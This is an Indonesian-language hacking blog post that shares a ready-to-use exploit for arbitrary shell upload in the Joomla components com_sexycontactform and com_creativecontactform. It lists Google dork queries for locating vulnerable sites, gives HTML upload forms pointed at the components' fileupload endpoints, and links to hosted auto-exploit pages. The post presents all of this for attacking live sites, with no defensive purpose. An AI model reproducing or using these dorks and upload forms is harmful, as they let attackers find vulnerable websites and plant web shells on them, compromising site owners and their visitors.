Assalamualaikum wr.wb
Selamat sore bung :)Kali ini ane mau share Exploit Joomla com_sexycontactform + com_creativecontactform Arbitary Shell Upload with CSRF
hehe memang sih ane telat share, soalnya dan pastinya udah banyak yang share exploit satu ini ..
Langsung saja ..
DORK :
com_sexycontactform =>
- inurl:"/index.php?option=com_sexycontactform"
- inurl:"/com_sexycontactform"
- inurl:"/mod_sexycontactform"
- intext:"/index.php?option=com_sexycontactform"
- intext:"/com_sexycontactform"
- intext:"/mod_sexycontactform"
com_creativecontactform =>
- inurl:"/index.php?option=com_creativecontactform"
- inurl:"/com_creativecontactform"
- inurl:"/mod_creativecontactform"
- intext:"/index.php?option=com_creativecontactform"
- intext:"/com_creativecontactform"
- intext:"/mod_creativecontactform"
(kembangin dork dengan imajinasi kalian :)
CSRF com_sexy :
<center><hr>
<form method="POST" target="_blank" action="http://target.com/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Submit File</button>
</form><hr></center>
CSRF com_creativecontact :
<center><hr>
<form method="POST" target="_blank" action="http://target.com/components/com_creativecontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Submit File</button>
</form><hr></center>
atau jika kalian tidak ingin susah payah, bisa pake Online CSRF nya atau auto exploitnya
Online CSRF com_sexycontactform : http://exploit-online.irc.so/sexycontact.php
Online CSRF com_creativecontactform : http://exploit-online.irc.so/creativecontact.php
sekian aja ya bro kalo bingun coret2 di komentar :)
Wassalamualaikum wr.wb
./Synchronizer
0 Response to "Joomla com_sexycontactform + com_creativecontactform Arbitary Shell Upload (CSRF)"
Posting Komentar